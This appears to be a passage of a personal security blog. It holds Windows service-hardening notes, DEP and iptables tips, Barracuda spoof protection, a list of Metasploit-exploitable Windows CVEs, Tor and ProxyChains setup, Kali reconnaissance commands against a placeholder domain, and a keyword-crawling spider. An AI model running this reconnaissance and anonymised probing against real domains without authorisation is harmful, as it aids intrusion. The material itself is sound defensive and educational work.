Payments and NFC/SE Manager (manual) payment mechanism used by phone
Phone Service (manual) not a phone
Printer spooler:(automatic) not used by me
Printer extensions and notifications:(manual) not used by me
Radio Management Service (manual) phone related, not a phone
Sensor Data Service (manual) don't have sensors on my pc
Sensor monitoring service:(manual) not used by me. dont have screen briteness control.
Sensor service:(manual) no orientation device on my pc
Smart card device enumeration service:(manual). dont have smartcard devices
Smart card removal policy:(manual) dont have smartcard device. if hacked will lock pc.
Spatial Data Service (manual) no 3D equipment
Telephony: (manual) dont have telephony devices
Touch keyboard and handwriting panel service:(manual) dont have such device
WalletService (manual) don't use MS Wallet to make payments
Wi-Fi Direct Services Connection Manager Service (manual) don't have Wi-Fi enabled monitor
Windows biometric service:(manual) dont have such device
Windows connect now - config registrar:(manual) dont have wireless on pc
Windows Insider Service (manual) I don't run pre-public-release versions
Windows Perception Service (manual) don't have 3D components
Windows Perception Simulation Service (manual) don't have 3D components
Windows PushToInstall Service (manual) I don't download apps from the Store
WWAN autoconfig:(manual) dont have GSM or CDMA device
Windows 7 64-bit:
Computer Browser (manual) (finds other PCs in the network)
Distributed Link Tracking Client (automatic) (maintain shortcuts if source file name has changed)
DNS client (automatic) (caches previously looked up domain names)
Function Discovery Provider Host (manual) (HomeGroup)
Function discovery resource publication (manual) (HomeGroup)
HomeGroup Listener (manual) (HomeGroup)
HomeGroup Provider (manual) (HomeGroup)
Internet Connection Sharing (disabled) (makes PC act as router)
IP Helper (automatic) (IPv6 tunneling)
Link Layer Topology discovery mapper (manual) (network discovery)
Media Center Extender service (disabled) (turns PC into media server)
Net. TCP port Sharing service (disabled)
NetLogon (manual)
Network Access Protection Agent (manual) (reports security configuration)
Parental controls (manual) (empty stub for compatibility with Vista)
Peer Name Resolution Protocol (manual)
Peer Networking Grouping (manual) (HomeGroup, remote assistance)
Peer Networking Identity Mgr (manual) (HomeGroup, remote assistance)
Performance Counter DLL Host (manual) (allows remote query to performance counters)
Performance Logs & Alerts (manual) (collects remote and local perf data)
PnP-X Ip Bus Enumerator (manual) (uses SSDP)
PNRP Machine Name Publication Service (manual) (server that responds with a machine name)
Quality Windows Audio Video Experience (manual) (multimedia server)
Remote Access Auto Connection Mgr (manual)
Remote Access Connection Manager (manual) (dialup, VPN)
Remote Desktop Configuration (manual)
Remote Desktop Service (manual) (server allowing remote control)
Remote Registry (manual)
Routing and Remote Access (disabled)
Secondary logon (manual)
Secure Socket Tunneling Protocol service (manual) (VPN)
Server (automatic) (HomeGroup, File and Printer Sharing)
SNMP Trap (manual)
SSDP Discovery (manual)
Tablet PC Input Service (manual)
TCP/IP NetBIOS Helper (automatic)
Telephony (manual) (affects Remote Access Connection mgr/ VPN)
UPnP Device host (manual)
Web Client (manual)
Windows Connect Now (manual) (Wireless Setup - simplified configuration)
Windows Error Reporting Service (manual) (reports system problems to MS and fetches solutions)
Windows Event Collector (manual) (allow remote subscription to log events)
Windows Media Player Network Sharing service (manual)
Windows Remote Management (manual) (Server, listens for remote requests )
WinHTTP Web Proxy auto discovery (manual) (proxy discovery and some kind of http api )
WMI Performance Adapter (manual) (provides performance data to other PC collecting it)
Workstation (automatic) (HomeGroup)
Monday, April 29, 2019
Regarding DEP function being able to defend Buffer Overflow in Windows environments
Determine the DEP policy currently in effect:
wmic OS Get DataExecutionPrevention_SupportPolicy
Statuses of DEP:
Value, Policy Level, Description
0, AlwaysOff, DEP is not enabled for any process
1, AlwaysOn, DEP is enabled for every process and cannot be opted out of
2, OptIn (default on client Windows), Only Windows system components and services have DEP applied; other programs must opt in
3, OptOut (default on Windows Server), DEP is enabled for all processes except those on an exception list maintained by an Administrator
Enable DEP for all processes (run from an elevated prompt; takes effect after a restart):
bcdedit.exe /set nx AlwaysOn
Disable DEP (run from an elevated prompt; takes effect after a restart; only for troubleshooting, since it removes the protection from every process):
bcdedit.exe /set nx AlwaysOff
Bear in mind that DEP only stops injected code from executing on non-executable pages such as the stack and heap; it does not stop return-oriented or ret2libc payloads that reuse code already mapped as executable, so it is a mitigation for classic buffer overflows rather than a fix, and should be combined with ASLR and patching.
Monday, April 22, 2019
How to prevent unauthorized users from sending fake emails to Barracuda
A free SMTP test service such as Wormly.com lets an attacker submit a message with a forged sender address (for example one of your own domains) straight to a Barracuda Email Security Gateway, and by default Barracuda accepts it.
The easy way to sort out this issue is to enable the function called "Sender Spoof Protection", which rejects inbound messages whose "From" address belongs to one of your own domains.
Go to the "ADVANCED" -> "Email Protocol" page, choose the "Yes" option next to "Sender Spoof Protection", and then click the "Save" button at the top right. Before enabling it, make sure that legitimate third-party services which send mail as your domain are still allowed through, and publish SPF, DKIM and DMARC records for the domain so that other receivers can reject the same spoofed mail.
Wednesday, April 10, 2019
Tuesday, February 19, 2019
Common vulnerabilities with Metasploit exploit modules, as of Feb 19, 2019
MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020)
Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067)
Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040)
Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026)
Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop (CVE-2010-0017, MSB-MS10-006)
Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240)
Apache mod_isapi <= 2.2.14 Dangling Pointer (CVE-2010-0425)
Java AtomicReferenceArray Type Violation Vulnerability (CVE-2012-0507)
Microsoft Windows Authenticated User Code Execution (CVE-1999-0504)
Microsoft Plug and Play Service Overflow (CVE-2005-1983, MSB-MS05-039)
Microsoft Windows XP/2000 'Lsasrv.dll' Remote Universal (CVE-2003-0533, MS04-011)
MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption (CVE-2017-0143, MS17-010)
Microsoft Windows SMB Processing Array Indexing Vulnerability (CVE-2009-3103, MS09-050)
Thursday, January 17, 2019
Threat Intelligence – Regulations
Any U.S. bank should pay attention to the following laws, regulations and frameworks:
Strongly recommended:
OCC (Office of the Comptroller of the Currency) guidance
NYDFS 23 NYCRR Part 500 (DFS 500)
FFIEC (including the IT Examination Handbook booklets)
SWIFT Customer Security Programme (CSP)
CHIPS
FedLine Security Controls
GLBA
Optional:
PCI DSS (only if payment card data is handled)
ISO 27001/ISO 27002
NIST SP 800 series
FIPS 140-2
Wednesday, January 16, 2019
Use ProxyChains with Tor
#/etc/init.d/tor start
#vi /etc/proxychains.conf
dynamic_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 9050
:wq
#proxychains lynx http://v4.ifconfig.co/
Bear in mind that dynamic_chain walks the proxy list in order and skips entries that are down, and proxy_dns resolves hostnames through the chain so that DNS lookups do not leak to the local resolver. One entry for Tor's SOCKS port (9050) is enough; listing it twice, once as socks4 and once as socks5, would make proxychains try to chain through the same Tor port twice. The page fetched through lynx should show a Tor exit address rather than your own; https://check.torproject.org/ will also confirm that the exit is a known Tor relay.
Monday, January 14, 2019
Threat Intelligence - Security News
Security news can be followed on the sites below:
https://www.infosecurity-magazine.com/news/
https://threatpost.com/
https://securityintelligence.com/news/
https://www.securityweek.com/
https://www.cnet.com/topics/security/
https://www.bankinfosecurity.com/latest-news
https://www.darkreading.com/
Sunday, January 13, 2019
Launching a reconnaissance in Kali
Replace aaa.com with the target domain. whois and the dig queries are passive lookups against public registries and DNS; fierce and dnsrecon attempt zone transfers and brute-force subdomains, which is noisy and only appropriate against a domain you are authorised to test; theHarvester gathers hostnames and e-mail addresses from public search engines.
#whois aaa.com
#dig aaa.com soa
#dig aaa.com ns
#dig aaa.com a
#dig aaa.com mx
#dig aaa.com txt
#fierce -dns aaa.com
#dnsrecon -d aaa.com -a --iw -z
#theharvester -d aaa.com -b all -l 1000 -h
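What a recon pass does with the `dig aaa.com mx` and `dig aaa.com txt` answers, as an added Python example that is not part of the original post: the MX answer gives the mail exchangers in preference order, and the domain's SPF TXT record lists every host, network and third-party provider authorised to send mail as the domain, which is often the quickest map of who handles its e-mail. The answer lines below are constructed in dig's answer-section format (name ttl class type rdata) for the placeholder domain aaa.com; the provider names in them are invented.

```python
"""Extract mail exchangers and SPF-authorised senders from dig answer lines.

Added example, not part of the original post. Input lines are constructed.
"""
import re
from typing import Any, Dict, List, Optional, Set, Tuple

SAMPLE_MX_LINES = [
    "aaa.com.\t3600\tIN\tMX\t10 mx1.aaa.com.",
    "aaa.com.\t3600\tIN\tMX\t20 mx2.aaa.com.",
    "aaa.com.\t3600\tIN\tMX\t5 aspmx.l.mailprovider.test.",
]
SAMPLE_TXT_LINES = [
    'aaa.com.\t3600\tIN\tTXT\t"google-site-verification=abc123"',
    # dig prints long TXT records as several quoted strings that must be joined
    'aaa.com.\t3600\tIN\tTXT\t"v=spf1 ip4:203.0.113.0/24 ip6:2001:db8::/32 a " '
    '"mx:mail.aaa.com include:_spf.mailprovider.test -all"',
]

_QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')
# qualifier, mechanism, optional ":value", optional "/cidr" (dual-CIDR kept as text)
_MECHANISM = re.compile(
    r"^([+\-~?]?)(all|include|a|mx|ptr|ip4|ip6|exists)(?::([^/]+?))?(?:/([0-9/]+))?$", re.I
)


def parse_mx(lines: List[str]) -> List[Tuple[int, str]]:
    """[(preference, host)] sorted so the most preferred exchanger comes first."""
    exchangers = []
    for line in lines:
        fields = line.split()
        if len(fields) >= 6 and fields[3].upper() == "MX":
            exchangers.append((int(fields[4]), fields[5].rstrip(".").lower()))
    return sorted(exchangers)


def spf_record(lines: List[str]) -> Optional[str]:
    """Join the quoted chunks of each TXT answer and return the v=spf1 record."""
    for line in lines:
        fields = line.split(None, 4)
        if len(fields) == 5 and fields[3].upper() == "TXT":
            text = "".join(_QUOTED.findall(fields[4]))
            if text.lower().startswith("v=spf1"):
                return text
    return None


def parse_spf(lines: List[str], domain: str) -> Dict[str, Any]:
    """Split the SPF record into mechanisms.

    "a" and "mx" without an argument mean the domain itself, so the domain is
    substituted. "all" keeps its qualifier (- hard fail, ~ soft fail, ? neutral,
    + anyone). Modifiers such as redirect= are kept under their own name.
    """
    result: Dict[str, Any] = {"ip4": [], "ip6": [], "a": [], "mx": [], "include": [], "all": None}
    record = spf_record(lines)
    if record is None:
        return result
    for token in record.split()[1:]:
        if "=" in token:                                  # modifier, e.g. redirect=
            name, _, value = token.partition("=")
            result.setdefault(name.lower(), []).append(value)
            continue
        match = _MECHANISM.match(token)
        if not match:
            continue                                      # unknown mechanism: ignore
        qualifier, name, value, cidr = match.groups()
        name = name.lower()
        if name == "all":
            result["all"] = qualifier or "+"
        elif name in ("ip4", "ip6"):
            result[name].append(value + ("/" + cidr if cidr else ""))
        else:
            result.setdefault(name, []).append((value or domain).lower())
    return result


def third_party_providers(domain: str, mx: List[Tuple[int, str]], spf: Dict[str, Any]) -> Set[str]:
    """Registrable domains (last two labels; crude for co.uk-style suffixes) of
    exchangers and SPF includes that are not the target domain itself."""
    hosts = [host for _, host in mx] + list(spf.get("include", []))
    providers = set()
    for host in hosts:
        parent = ".".join(host.split(".")[-2:])
        if parent != domain.lower():
            providers.add(parent)
    return providers


if __name__ == "__main__":
    mx = parse_mx(SAMPLE_MX_LINES)
    spf = parse_spf(SAMPLE_TXT_LINES, "aaa.com")
    print("MX:", mx)
    print("SPF:", spf)
    print("third parties:", third_party_providers("aaa.com", mx, spf))
```

Feed it the real answer-section lines from dig and the "include" targets become the next domains to query, since each one carries its own SPF record and often reveals further providers.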
Saturday, January 12, 2019
Set up and use Tor Client in Kali
[Install Tor Client in Kali]:
#apt-get update
#apt-cache search tor|grep '^tor'
#apt-get install tor
[Start Tor service]:
#/etc/init.d/tor start
[How to use the Tor service through regular browsers]:
Point the browser's SOCKS5 proxy at 127.0.0.1:9050 and enable the option to resolve DNS through the SOCKS5 proxy (in Firefox, "Proxy DNS when using SOCKS v5"); without it the TCP connections go through Tor but every name lookup still leaks to the local resolver.
[Use the following websites to verify that you are reaching Tor]:
http://xmh57jrzrnw6insl.onion/ '''A Tor search engine
http://torlinkbgs6aabns.onion/ '''A darknet link directory
.onion names only resolve inside Tor, so loading either page proves that both the connection and the DNS lookup went through the proxy. These two are 16-character v2 onion addresses, which the Tor network stopped serving in 2021; repeating the check today needs a current 56-character v3 address.
Friday, January 11, 2019
Install and execute Scrapy in order to find those pages containing specific keywords
[Install Scrapy]:
#apt-get update
#apt-get install python3-scrapy
[Set up a spider]:
#scrapy startproject search_keywords '''Here we create a project call search_keywords
#cd search_keywords
#scrapy genspider demonalex demonalex.com '''Here we create a spider called demonalex
#cd search_keywords/spiders
#cp ./demonalex.py ./demonalex_py.bak
[Modify the spider script]:
#vi ./demonalex.py '''Modify the content of the spider script called demonalex.py
--------------------------------
import re

from scrapy.http import TextResponse
from scrapy.item import Item
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule


def find_all_substrings(string, sub):
    # Start offsets of every (case-sensitive) occurrence of sub in string
    return [match.start() for match in re.finditer(re.escape(sub), string)]


class WebsiteSpider(CrawlSpider):
    name = "demonalex"                       # The name of the spider
    allowed_domains = ["www.phooky.com"]     # Here we define the domain name being crawled
    start_urls = ["http://www.phooky.com"]   # Here we define the start point being scanned
    rules = [Rule(LinkExtractor(), follow=True, callback="check_buzzwords")]
    crawl_count = 0
    words_found = 0

    def check_buzzwords(self, response):
        self.__class__.crawl_count += 1
        wordlist = [                         # This is a keyword list.
            "Lorem",
            "dolores",
            "feugiat",
        ]
        # Only text responses (HTML, plain text) can be searched; binaries are skipped.
        if not isinstance(response, TextResponse):
            return Item()
        url = response.url
        data = response.text                 # body decoded with the encoding Scrapy detected
        for word in wordlist:
            for pos in find_all_substrings(data, word):
                self.__class__.words_found += 1
                print(word + ";" + url + ";" + str(pos))
        return Item()

    def _requests_to_follow(self, response):
        # CrawlSpider can only extract links from text responses; do not follow from binaries.
        if getattr(response, "encoding", None) is not None:
            return CrawlSpider._requests_to_follow(self, response)
        return []
--------------------------------
[Executing the spider] (run from inside the search_keywords project directory):
#scrapy crawl demonalex
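A tighter version of the keyword check, as an added Python example that is not part of the original spider and needs no Scrapy to run: the spider searches the raw body, so a keyword inside a tag, a CSS class or a script counts as a hit and a partial word such as "doloresque" matches "dolores". Here script/style blocks and tags are stripped first, matching is whole-word and case-insensitive, binary bodies are skipped, and each hit carries a short context snippet for triage. The pages below are constructed for the example, not fetched from any real site; in the spider, `response.body` would be passed in place of them.

```python
"""Keyword search over page bodies, runnable offline.

Added example, not part of the original spider. Sample pages are constructed.
"""
import html
import re
from typing import Dict, List, Tuple

SAMPLE_PAGES: Dict[str, bytes] = {
    "http://www.example.test/index.html": (
        b"<html><head><title>Lorem page</title>"
        b"<style>.lorem-grid{color:red}</style></head>"
        b"<body><h1>Lorem ipsum</h1><p>Dolores&nbsp;feugiat sit amet.</p>"
        b"<script>var dolores = 1;</script></body></html>"
    ),
    "http://www.example.test/about.html": (
        b"<html><body><p>Nothing to see here, doloresque.</p></body></html>"
    ),
    "http://www.example.test/logo.png": b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR",
}

_BLOCK_RE = re.compile(r"<(script|style)\b.*?</\1\s*>", re.I | re.S)
_TAG_RE = re.compile(r"<[^>]+>")

Hit = Tuple[str, int, str]  # (keyword, offset in the visible text, context snippet)


def is_text(body: bytes) -> bool:
    """Cheap binary sniff: a NUL byte or invalid UTF-8 means not searchable text."""
    if b"\x00" in body:
        return False
    try:
        body.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return True


def html_to_text(body: bytes) -> str:
    """Reduce an HTML body to the text a reader would see, whitespace-normalised."""
    text = body.decode("utf-8", errors="replace")
    text = _BLOCK_RE.sub(" ", text)   # drop script and style contents
    text = _TAG_RE.sub(" ", text)     # drop remaining tags
    text = html.unescape(text)        # &nbsp;, &amp; ... -> characters
    return re.sub(r"\s+", " ", text).strip()


def find_keywords(text: str, wordlist: List[str], context: int = 20) -> List[Hit]:
    """Whole-word, case-insensitive matches of each keyword, with a snippet."""
    hits: List[Hit] = []
    for word in wordlist:
        pattern = re.compile(r"\b" + re.escape(word) + r"\b", re.I)
        for match in pattern.finditer(text):
            start = max(0, match.start() - context)
            end = min(len(text), match.end() + context)
            hits.append((word, match.start(), text[start:end]))
    return hits


def scan_pages(pages: Dict[str, bytes], wordlist: List[str]) -> Dict[str, List[Hit]]:
    """Return {url: hits} for every text page with at least one hit."""
    results: Dict[str, List[Hit]] = {}
    for url, body in pages.items():
        if not is_text(body):
            continue
        hits = find_keywords(html_to_text(body), wordlist)
        if hits:
            results[url] = hits
    return results


if __name__ == "__main__":
    for url, hits in scan_pages(SAMPLE_PAGES, ["Lorem", "dolores", "feugiat"]).items():
        for word, offset, snippet in hits:
            print(f"{word};{url};{offset};{snippet}")
```

On the sample pages only index.html is reported: the "lorem-grid" class and the "dolores" variable in the script are ignored, "doloresque" on the about page is not a whole-word match, and the PNG is skipped as binary.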
Tuesday, January 8, 2019
[Threat Intelligence] Threat Intelligence Report's Template
1) Security News [Reader: IT, IS, RISK]
Raises the security awareness of IT, IS and Risk.
2) New Security Regulation (Specific) [Reader: IT, IS, RISK]
Once a new regulation is known, IT, IS and Risk open a task to revise the corresponding policies and procedures.
3) New Vulnerabilities (Specific) [Reader: IT, IS]
IT and IS follow up by triggering a hardening (patching or mitigation) process for the newly reported vulnerabilities.
4) New Threats (Specific) [Reader: IT, IS]
The risk assessment team adds the new threats to the threat pool used by the risk assessment.
5) Data Leakage Investigation (Specific; data breaches found on the Internet and darknet) [Reader: IT, IS, RISK, Management]
A confirmed data leakage triggers the incident response process.
6) Indicator of Compromise (IOC) feeds (to be loaded into threat detection systems) [Reader: IT, IS]
The feeds should cover the categories below:
-IP address
-Domain
-URL
-Transport-layer port number
-Email address
-Filename
-File path
-Hash (MD5, SHA-1 or SHA-256)
-String
The IOC feeds should be imported into threat detection systems such as IDS/IPS, UTM, anti-virus, or the SIEM.
7) Action Plan (Specific; in response to the new regulations, vulnerabilities, threats and IOCs) [Reader: IT, IS, RISK, Management]
Saturday, January 5, 2019
Utilize IPTABLES to block ports
Block a port:
#iptables -A INPUT -p tcp --dport 22 -j REJECT
See all rules:
#iptables --list
Empty all rules:
#iptables --flush
Bear in mind that rules are evaluated top down, so a REJECT appended with -A after an earlier ACCEPT for the same port never matches (insert it at the top of the chain with -I instead); REJECT answers the client with an error whereas DROP silently discards the packet; --flush removes the rules but leaves the chain default policy untouched and does nothing for IPv6, which has its own ip6tables rule set; and none of these changes survive a reboot unless the rule set is saved.